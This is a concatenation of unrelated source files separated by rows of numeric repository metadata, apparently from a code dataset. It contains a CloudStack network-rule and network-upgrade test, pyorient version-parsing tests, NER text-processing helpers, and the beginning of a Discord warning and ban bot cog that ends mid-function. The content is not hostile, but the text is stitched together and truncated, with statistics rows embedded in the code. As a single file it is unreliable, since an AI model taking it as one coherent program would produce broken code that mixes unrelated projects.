self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
src_nat_list = PublicIPAddress.list(
self.apiclient,
associatednetworkid=self.network.id,
account=self.account.name,
domainid=self.account.domainid,
listall=True,
issourcenat=True,
)
self.assertEqual(
isinstance(src_nat_list, list),
True,
"List Public IP should return a valid source NAT"
)
self.assertNotEqual(
len(src_nat_list),
0,
"Length of response from listPublicIp should not be 0"
)
src_nat = src_nat_list[0]
self.debug("Trying to create LB rule on source NAT IP: %s" %
src_nat.ipaddress)
# Create Load Balancer rule with source NAT
with self.assertRaises(Exception):
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=src_nat.id,
accountid=self.account.name
)
self.debug(
"Trying to create a port forwarding rule in source NAT: %s" %
src_nat.ipaddress)
#Create NAT rule
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=src_nat.id
)
self.debug("Created PF rule on source NAT: %s" % src_nat.ipaddress)
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT should return a valid port forwarding rules"
)
self.assertNotEqual(
len(nat_rules),
0,
"Length of response from listLbRules should not be 0"
)
self.debug("Creating firewall rule on source NAT: %s" %
src_nat.ipaddress)
#Create Firewall rule on source NAT
fw_rule = FireWallRule.create(
self.apiclient,
ipaddressid=src_nat.id,
protocol='TCP',
cidrlist=[self.services["fw_rule"]["cidr"]],
startport=self.services["fw_rule"]["startport"],
endport=self.services["fw_rule"]["endport"]
)
self.debug("Created firewall rule: %s" % fw_rule.id)
fw_rules = FireWallRule.list(
self.apiclient,
id=fw_rule.id
)
self.assertEqual(
isinstance(fw_rules, list),
True,
"List fw rules should return a valid firewall rules"
)
self.assertNotEqual(
len(fw_rules),
0,
"Length of fw rules response should not be zero"
)
self.debug("Associating public IP for network: %s" % self.network.id)
ip_with_nat_rule = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
ip_with_nat_rule.ipaddress,
self.network.id
))
self.debug("Creating PF rule for IP address: %s" %
ip_with_nat_rule.ipaddress)
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=ip_with_nat_rule.ipaddress.id
)
self.debug("Trying to create LB rule on IP with NAT: %s" %
ip_with_nat_rule.ipaddress)
# Create Load Balancer rule on IP already having NAT rule
with self.assertRaises(Exception):
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=ip_with_nat_rule.ipaddress.id,
accountid=self.account.name
)
self.debug("Creating PF rule with public port: 66")
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule_port_66"],
ipaddressid=ip_with_nat_rule.ipaddress.id
)
# Check if NAT rule created successfully
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT rules should return valid list"
)
self.debug("Associating public IP for network: %s" % self.network.id)
ip_with_lb_rule = PublicIPAddress.create(
self.apiclient,
accountid=self.account.name,
zoneid=self.zone.id,
domainid=self.account.domainid,
networkid=self.network.id
)
self.debug("Associated %s with network %s" % (
ip_with_lb_rule.ipaddress,
self.network.id
))
self.debug("Creating LB rule for IP address: %s" %
ip_with_lb_rule.ipaddress)
LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=ip_with_lb_rule.ipaddress.id,
accountid=self.account.name,
networkid=self.network.id
)
self.debug("Trying to create PF rule on IP with LB rule: %s" %
ip_with_nat_rule.ipaddress)
with self.assertRaises(Exception):
NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=ip_with_lb_rule.ipaddress.id
)
self.debug("Trying to create FW rule on IP with LB rule")
with self.assertRaises(Exception):
FireWallRule.create(
self.apiclient,
ipaddressid=src_nat.id,
protocol='TCP',
cidrlist=[self.services["fw_rule"]["cidr"]],
startport=self.services["fw_rule"]["startport"],
endport=self.services["fw_rule"]["endport"]
)
self.debug("Creating LB rule with public port: 2221")
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule_port_2221"],
ipaddressid=ip_with_lb_rule.ipaddress.id,
accountid=self.account.name,
networkid=self.network.id
)
# Check if NAT rule created successfully
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List LB rules should return valid list"
)
# User should be able to enable VPN on source NAT
self.debug("Created VPN with source NAT IP: %s" % src_nat.ipaddress)
# Assign VPN to source NAT
vpn = Vpn.create(
self.apiclient,
src_nat.id,
account=self.account.name,
domainid=self.account.domainid
)
vpns = Vpn.list(
self.apiclient,
publicipid=src_nat.id,
listall=True,
)
self.assertEqual(
isinstance(vpns, list),
True,
"List VPNs should return a valid VPN list"
)
self.assertNotEqual(
len(vpns),
0,
"Length of list VNP response should not be zero"
)
return
class TestNetworkUpgrade(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.api_client = super(
TestNetworkUpgrade,
cls
).getClsTestClient().getApiClient()
cls.services = Services().services
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client, cls.services)
cls.zone = get_zone(cls.api_client, cls.services)
cls.services['mode'] = cls.zone.networktype
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.services["network_offering"],
conservemode=True
)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
cls._cleanup = [
cls.service_offering,
cls.network_offering
]
return
@classmethod
def tearDownClass(cls):
try:
#Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.services["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup = []
return
def tearDown(self):
try:
self.account.delete(self.apiclient)
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(speed = "slow")
@attr(tags = ["advancedns"])
def test_01_nwupgrade_netscaler_conserve_on(self):
"""Test Nw upgrade to netscaler lb service and conserve mode ON
"""
# Validate the following
# 1. Upgrade a network with VR and conserve mode ON TO
# A network that has Lb provided by "Netscaler" and all other
# services provided by "VR" and Conserve mode ON
# 2. Have PF and LB rules on the same ip address. Upgrade network
# should fail.
# 3. Have SourceNat,PF and VPN on the same IP address. Upgrade of
# network should succeed.
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
src_nat_list = PublicIPAddress.list(
self.apiclient,
associatednetworkid=self.network.id,
account=self.account.name,
domainid=self.account.domainid,
listall=True,
issourcenat=True,
)
self.assertEqual(
isinstance(src_nat_list, list),
True,
"List Public IP should return a valid source NAT"
)
self.assertNotEqual(
len(src_nat_list),
0,
"Length of response from listPublicIp should not be 0"
)
src_nat = src_nat_list[0]
self.debug("Trying to create LB rule on source NAT IP: %s" %
src_nat.ipaddress)
# Create Load Balancer rule with source NAT
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=src_nat.id,
accountid=self.account.name
)
self.debug("Created LB rule on source NAT: %s" % src_nat.ipaddress)
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List lb rules should return a valid lb rules"
)
self.assertNotEqual(
len(lb_rules),
0,
"Length of response from listLbRules should not be 0"
)
self.debug(
"Trying to create a port forwarding rule in source NAT: %s" %
src_nat.ipaddress)
#Create NAT rule
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=src_nat.id
)
self.debug("Created PF rule on source NAT: %s" % src_nat.ipaddress)
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT should return a valid port forwarding rules"
)
self.assertNotEqual(
len(nat_rules),
0,
"Length of response from listLbRules should not be 0"
)
# Create a network offering with all virtual router services enabled
self.debug(
"Creating n/w offering with all services in VR & conserve mode:ON LB- Netscaler"
)
ns_lb_offering = NetworkOffering.create(
self.api_client,
self.services["network_offering_netscaler"],
conservemode=True
)
self.cleanup.append(ns_lb_offering)
ns_lb_offering.update(self.apiclient, state='Enabled')
#Stop all the VMs associated with network to update cidr
self.debug("Stopping the VM: %s" % virtual_machine.name)
virtual_machine.stop(self.apiclient)
self.debug("Updating network offering for network: %s" %
self.network.id)
with self.assertRaises(Exception):
self.network.update(
self.apiclient,
networkofferingid=ns_lb_offering.id,
changecidr=True
)
self.debug("Network upgrade failed!")
self.debug("Deleting LB Rule: %s" % lb_rule.id)
lb_rule.delete(self.apiclient)
self.debug("LB rule deleted")
# Assign VPN to source NAT
self.debug("Enabling VPN on source NAT")
vpn = Vpn.create(
self.apiclient,
src_nat.id,
account=self.account.name,
domainid=self.account.domainid
)
vpns = Vpn.list(
self.apiclient,
publicipid=src_nat.id,
listall=True,
)
self.assertEqual(
isinstance(vpns, list),
True,
"List VPNs should return a valid VPN list"
)
self.assertNotEqual(
len(vpns),
0,
"Length of list VPN response should not be zero"
)
self.debug("Upgrading the network: %s" % self.network.id)
self.network.update(
self.apiclient,
networkofferingid=ns_lb_offering.id,
changecidr=True
)
networks = Network.list(
self.apiclient,
id=self.network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List Networks should return a valid list for given network ID"
)
self.assertNotEqual(
len(networks),
0,
"Length of list networks should not be 0"
)
network = networks[0]
self.assertEqual(
network.networkofferingid,
ns_lb_offering.id,
"Network offering ID should match with new offering ID"
)
return
@attr(speed = "slow")
@attr(tags = ["advancedns"])
def test_02_nwupgrade_netscaler_conserve_off(self):
"""Test Nw upgrade to netscaler lb service and conserve mode OFF
"""
# Validate the following
# 1. Upgrade a network with VR and conserve mode ON TO
# A network that has Lb provided by "Netscaler" and all other
# services provided by "VR" and Conserve mode OFF
# 2. Have PF and LB rules on the same ip address. Upgrade network
# should fail.
# 3. Have SourceNat,PF and VPN on the same IP address. Upgrade of
# network should fail.
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.services["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
src_nat_list = PublicIPAddress.list(
self.apiclient,
associatednetworkid=self.network.id,
account=self.account.name,
domainid=self.account.domainid,
listall=True,
issourcenat=True,
)
self.assertEqual(
isinstance(src_nat_list, list),
True,
"List Public IP should return a valid source NAT"
)
self.assertNotEqual(
len(src_nat_list),
0,
"Length of response from listPublicIp should not be 0"
)
src_nat = src_nat_list[0]
self.debug("Trying to create LB rule on source NAT IP: %s" %
src_nat.ipaddress)
# Create Load Balancer rule with source NAT
lb_rule = LoadBalancerRule.create(
self.apiclient,
self.services["lbrule"],
ipaddressid=src_nat.id,
accountid=self.account.name
)
self.debug("Created LB rule on source NAT: %s" % src_nat.ipaddress)
lb_rules = LoadBalancerRule.list(
self.apiclient,
id=lb_rule.id
)
self.assertEqual(
isinstance(lb_rules, list),
True,
"List lb rules should return a valid lb rules"
)
self.assertNotEqual(
len(lb_rules),
0,
"Length of response from listLbRules should not be 0"
)
self.debug(
"Trying to create a port forwarding rule in source NAT: %s" %
src_nat.ipaddress)
#Create NAT rule
nat_rule = NATRule.create(
self.apiclient,
virtual_machine,
self.services["natrule"],
ipaddressid=src_nat.id
)
self.debug("Created PF rule on source NAT: %s" % src_nat.ipaddress)
nat_rules = NATRule.list(
self.apiclient,
id=nat_rule.id
)
self.assertEqual(
isinstance(nat_rules, list),
True,
"List NAT should return a valid port forwarding rules"
)
self.assertNotEqual(
len(nat_rules),
0,
"Length of response from listLbRules should not be 0"
)
# Create a network offering with all virtual router services enabled
self.debug(
"Creating n/w offering with all services in VR & conserve mode:ON LB- Netscaler"
)
ns_lb_offering = NetworkOffering.create(
self.api_client,
self.services["network_offering_netscaler"],
conservemode=False
)
self.cleanup.append(ns_lb_offering)
ns_lb_offering.update(self.apiclient, state='Enabled')
#Stop all the VMs associated with network to update cidr
self.debug("Stopping the VM: %s" % virtual_machine.name)
virtual_machine.stop(self.apiclient)
self.debug("Updating network offering for network: %s" %
self.network.id)
with self.assertRaises(Exception):
self.network.update(
self.apiclient,
networkofferingid=ns_lb_offering.id,
changecidr=True
)
self.debug("Network upgrade failed!")
self.debug("Deleting LB Rule: %s" % lb_rule.id)
lb_rule.delete(self.apiclient)
self.debug("LB rule deleted")
# Assign VPN to source NAT
self.debug("Enabling VPN on source NAT")
vpn = Vpn.create(
self.apiclient,
src_nat.id,
account=self.account.name,
domainid=self.account.domainid
)
vpns = Vpn.list(
self.apiclient,
publicipid=src_nat.id,
listall=True,
)
self.assertEqual(
isinstance(vpns, list),
True,
"List VPNs should return a valid VPN list"
)
self.assertNotEqual(
len(vpns),
0,
"Length of list VPN response should not be zero"
)
self.debug("Upgrading the network: %s" % self.network.id)
with self.assertRaises(Exception):
self.network.update(
self.apiclient,
networkofferingid=ns_lb_offering.id,
changecidr=True
)
return
| 44.794772 | 128 | 0.425709 | 6,519 | 80,541 | 5.169658 | 0.056144 | 0.046289 | 0.037773 | 0.025637 | 0.929142 | 0.919172 | 0.910774 | 0.907955 | 0.906234 | 0.895107 | 0 | 0.005395 | 0.509827 | 80,541 | 1,797 | 129 | 44.8197 | 0.848248 | 0.097665 | 0 | 0.807449 | 0 | 0 | 0.132199 | 0.003671 | 0 | 0 | 0 | 0 | 0.049192 | 1 | 0.013352 | false | 0.001405 | 0.006325 | 0 | 0.035137 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
31a92f74edbd4d620c3ad36d4ef4d78df8f5e534 | 3,908 | py | Python | tests/test_orient_version.py | spy7/pyorient | ac2547287f9299f4eec350666da3b19797872f20 | [
"Apache-2.0"
] | 142 | 2015-01-12T06:34:59.000Z | 2022-01-19T10:34:30.000Z | tests/test_orient_version.py | spy7/pyorient | ac2547287f9299f4eec350666da3b19797872f20 | [
"Apache-2.0"
] | 238 | 2015-01-04T21:05:41.000Z | 2021-04-12T17:45:53.000Z | tests/test_orient_version.py | spy7/pyorient | ac2547287f9299f4eec350666da3b19797872f20 | [
"Apache-2.0"
] | 107 | 2015-01-03T03:33:17.000Z | 2021-12-07T16:48:48.000Z | import unittest
import pyorient
# db_name = "GratefulDeadConcerts"
# client = pyorient.OrientDB("localhost", 2424)
# client.set_session_token(True)
# cluster_info = client.db_open( db_name, "admin", "admin" )
# print(client.db_count_records())
__author__ = 'Ostico <ostico@gmail.com>'
class OrientVersionTestCase( unittest.TestCase ):
""" Orient Version Test Case """
def test_string1(self):
release = "2.2.0-rc1"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 2
assert x.build == 0
assert x.subversion == "rc1"
def test_string2(self):
release = "1.10.1"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert x.major == 1
assert x.minor == 10
assert x.build == 1
assert x.subversion is ''
def test_string3(self):
release = "2.0.19-rc2"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 0
assert x.build == 19
assert x.subversion == "rc2"
def test_string4(self):
release = "2.2.0 ;Unknown (build 0)"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 2
assert x.build == 0
assert x.subversion == ";Unknown (build 0)"
def test_string5(self):
release = "2.2-rc1 ;Unknown (build 0)"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 2
assert x.build == 0
assert x.subversion == "rc1 ;Unknown (build 0)"
def test_string6(self):
release = "v2.2"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 2
assert x.build == 0
assert x.subversion == ""
def test_string_version2(self):
release = "2.2.0 (build develop@r79d281140b01c0bc3b566a46a64f1573cb359783; 2016-05-18 14:14:32+0000)"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 2
assert x.build == 0
assert x.subversion == "(build develop@r79d281140b01c0bc3b566a46a64f1573cb359783; 2016-05-18 14:14:32+0000)"
def test_new_string(self):
release = "OrientDB Server v2.2.0 (build develop@r79d281140b01c0bc3b566a46a64f1573cb359783; 2016-05-18 14:14:32+0000)"
x = pyorient.OrientVersion(release)
assert isinstance( x.major, int )
assert isinstance( x.minor, int )
assert isinstance( x.build, int )
assert isinstance( x.subversion, str )
assert x.major == 2
assert x.minor == 2
assert x.build == 0
assert x.subversion == "(build develop@r79d281140b01c0bc3b566a46a64f1573cb359783; 2016-05-18 14:14:32+0000)"
| 35.527273 | 126 | 0.610542 | 476 | 3,908 | 4.966387 | 0.153361 | 0.094755 | 0.222927 | 0.194585 | 0.765228 | 0.731387 | 0.731387 | 0.731387 | 0.731387 | 0.731387 | 0 | 0.092007 | 0.279683 | 3,908 | 109 | 127 | 35.853211 | 0.74778 | 0.058342 | 0 | 0.659341 | 0 | 0.021978 | 0.139275 | 0.054511 | 0 | 0 | 0 | 0 | 0.692308 | 1 | 0.087912 | false | 0 | 0.021978 | 0 | 0.120879 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
31b2ccec296e96d83ebe09dbc20d6bd874bc7187 | 6,889 | py | Python | src/processing_data.py | lingluodlut/BioCreativeVII_DrugProt | b3ee015286d0168ccc30e62bdfaca5a341164401 | [
"Apache-2.0"
] | null | null | null | src/processing_data.py | lingluodlut/BioCreativeVII_DrugProt | b3ee015286d0168ccc30e62bdfaca5a341164401 | [
"Apache-2.0"
] | null | null | null | src/processing_data.py | lingluodlut/BioCreativeVII_DrugProt | b3ee015286d0168ccc30e62bdfaca5a341164401 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 10 16:34:12 2020
@author: luol2
"""
import numpy as np
import io
import sys
#read ner text (word\tlabel), generate the list[[[w1,label],[w2,label]]]
def ml_intext(file):
fin=open(file,'r',encoding='utf-8')
alltexts=fin.read().strip().split('\n\n')
fin.close()
data_list=[]
label_list=[]
for sents in alltexts:
lines=sents.split('\n')
temp_sentece=[]
for i in range(0,len(lines)):
seg=lines[i].split('\t')
temp_sentece.append(seg[:])
label_list.append(seg[-1])
data_list.append(temp_sentece)
#print(data_list)
#print(label_list)
return data_list,label_list
def ml_intext_fn(alltexts):
# fin=io.StringIO(ml_input)
# alltexts=fin.read().strip().split('\n\n')
# fin.close()
data_list=[]
label_list=[]
for sents in alltexts:
lines=sents.split('\n')
temp_sentece=[]
for i in range(0,len(lines)):
seg=lines[i].split('\t')
temp_sentece.append(seg[:])
label_list.append(seg[-1])
data_list.append(temp_sentece)
#print(data_list)
#print(label_list)
return data_list,label_list
# model predict result to conll evalute format [token answer predict]
def out_BIO(file,raw_pre,raw_input,label_set):
fout=open(file,'w',encoding='utf-8')
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
label_id = raw_pre[i][j]
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
fout.close()
def out_BIO_softmax(file,raw_pre,raw_input,label_set):
fout=open(file,'w',encoding='utf-8')
#print(raw_pre[0:2])
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
label_id = np.argmax(raw_pre[i][j])
#print(label_id)
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
fout.close()
def out_BIO_fn(raw_pre,raw_input,label_set):
fout=io.StringIO()
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
label_id = raw_pre[i][j]
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
return fout.getvalue()
def out_BIO_BERT_softmax(file,raw_pre,raw_input,label_set):
fout=open(file,'w',encoding='utf-8')
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
# label_id = raw_pre[i][j]
label_id = np.argmax(raw_pre[i][j])
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
fout.close()
def out_BIO_BERT(file,raw_pre,raw_input,label_set):
fout=open(file,'w',encoding='utf-8')
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
label_id = raw_pre[i][j]
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
fout.close()
def out_BIO_BERT_fn(raw_pre,raw_input,label_set):
fout=io.StringIO()
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
label_id = raw_pre[i][j]
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
return fout.getvalue()
def out_BIO_BERT_softmax_fn(raw_pre,raw_input,label_set):
fout=io.StringIO()
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
#label_id = raw_pre[i][j]
label_id = np.argmax(raw_pre[i][j])
label_tag = label_set[str(label_id)]
else:
label_tag='O'
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\n')
fout.write('\n')
return fout.getvalue()
def out_BIO_BERT_softmax_score_fn(raw_pre,raw_input,label_set):
fout=io.StringIO()
for i in range(len(raw_input)):
for j in range(len(raw_input[i])):
if j<len(raw_pre[i]):
#label_id = raw_pre[i][j]
label_id = np.argmax(raw_pre[i][j])
label_score = round(raw_pre[i][j][label_id],4)
label_tag = label_set[str(label_id)]
else:
label_tag='O'
label_score = 0.0
fout.write(raw_input[i][j][0]+'\t'+raw_input[i][j][-1]+'\t'+label_tag+'\t'+str(label_score)+'\n')
fout.write('\n')
return fout.getvalue()
#generate char vocab
def char_vocab(infile,outfile_char):
fin=open(infile,'r',encoding='utf-8')
#fout=open(outfile,'w',encoding='utf-8')
fout_char=open(outfile_char,'w',encoding='utf-8')
char_vocab=['oov_char']
max_len=0
for line in fin:
if line.strip()!='':
seg=line.split('\t')
word_len=len(seg[0])
#if word_len<1000:
# fout.write(line)
if word_len>max_len:
max_len=word_len
print(seg[0])
for i in range(word_len):
if seg[0][i] not in char_vocab:
char_vocab.append(seg[0][i])
#else:
# fout.write(line)
fin.close()
#fout.close()
for ele in char_vocab:
fout_char.write(ele+'\n')
fout_char.close()
print('max_len:',max_len)
if __name__=='__main__':
# infile='//panfs/pan1/bionlp/lulab/luoling/HPO_project/AutoPhe/data/pubmed_unlabel/mutation_disease_1990.ner_BIO'
# #outfile='//panfs/pan1/bionlp/lulab/luoling/HPO_project/AutoPhe/data/pubmed_unlabel/mutation_disease_1990.ner_BIO_new'
# outfile_char='//panfs/pan1/bionlp/lulab/luoling/HPO_project/AutoPhe/src/nn_model/vocab/char_vocab'
# #processing_text(file)
# char_vocab(infile,outfile_char)
a=[1,2,3]
print(a[:-1])
| 34.10396 | 124 | 0.55262 | 1,040 | 6,889 | 3.441346 | 0.122115 | 0.08941 | 0.060352 | 0.058117 | 0.766695 | 0.752165 | 0.747974 | 0.739871 | 0.723107 | 0.723107 | 0 | 0.01478 | 0.28306 | 6,889 | 201 | 125 | 34.273632 | 0.70986 | 0.143853 | 0 | 0.735099 | 1 | 0 | 0.026612 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.072848 | false | 0 | 0.019868 | 0 | 0.13245 | 0.019868 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
31d1e1ebab368bd7fce09d43b620e96f803621e0 | 21,185 | py | Python | linsae/cogs/Warningsystem.py | drakedeveloper/Linsae | 1a866fbb95df3a7270e446dca18e9dca8beb2c3a | [
"Apache-2.0"
] | 1 | 2019-06-27T00:47:21.000Z | 2019-06-27T00:47:21.000Z | linsae/cogs/Warningsystem.py | drakedeveloper/Linsae | 1a866fbb95df3a7270e446dca18e9dca8beb2c3a | [
"Apache-2.0"
] | null | null | null | linsae/cogs/Warningsystem.py | drakedeveloper/Linsae | 1a866fbb95df3a7270e446dca18e9dca8beb2c3a | [
"Apache-2.0"
] | null | null | null | import discord
import time
import asyncio
from datetime import datetime
import time
from discord.ext import tasks, commands
from tinydb import TinyDB, Query
class Warninggsystem(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
@commands.cooldown(1, 15, commands.BucketType.user)
@commands.has_permissions(ban_members=True)
async def warn(self, ctx, member: discord.Member, *reason):
await ctx.message.delete()
db1 = TinyDB('db/moderation/warn.json')
db = TinyDB('db/moderation/logchannel.json')
Log = Query()
Warn = Query()
li = db1.search(Warn.member_id == member.id)
lig = db.search(Log.guild_id == ctx.guild.id)
if member.guild_permissions.administrator:
msg1 = await ctx.message.channel.send("🚫, you can't warn a moderator!")
await msg1.delete(delay=5)
if member.guild_permissions.administrator == False:
if member.id != ctx.message.author.id or member.id != self.bot.user.id:
if len(li) > 1:
await ctx.guild.ban(member)
if len(lig) != 0:
for i in lig:
global channel
channel_id = i['channel_id']
channel = self.bot.get_channel(int(channel_id))
embed = discord.Embed(title="__Moderation__", colour=0xe89384, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Temp ban**")
embed.add_field(name="__Moderator__", value=f"-{self.bot.user.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-Reached 3 warnings: {' '.join(reason)}")
embed.add_field(name="__Log channel__",
value=f"-{channel.mention}")
embed.add_field(name="__Time stamp__", value="2 hours")
embed.set_footer(text="?help for help", icon_url=self.bot.user.avatar_url)
embed.set_thumbnail(url=ctx.guild.icon_url)
await channel.send(embed=embed)
embed = discord.Embed(title="__Moderation__", colour=0xe89384, timestamp=datetime.utcnow())
embed.add_field(name="__Type__", value="**Temp ban**")
embed.add_field(name="__Moderator__", value=f"-{self.bot.user.mention}")
embed.add_field(name="__Member__", value=f"-{member.mention}")
embed.add_field(name="__Reason__", value=f"-Reached 3 warnings: {' '.join(reason)}")
embed.add_field(name="__Log channel__",
value=f"-{channel.mention}")
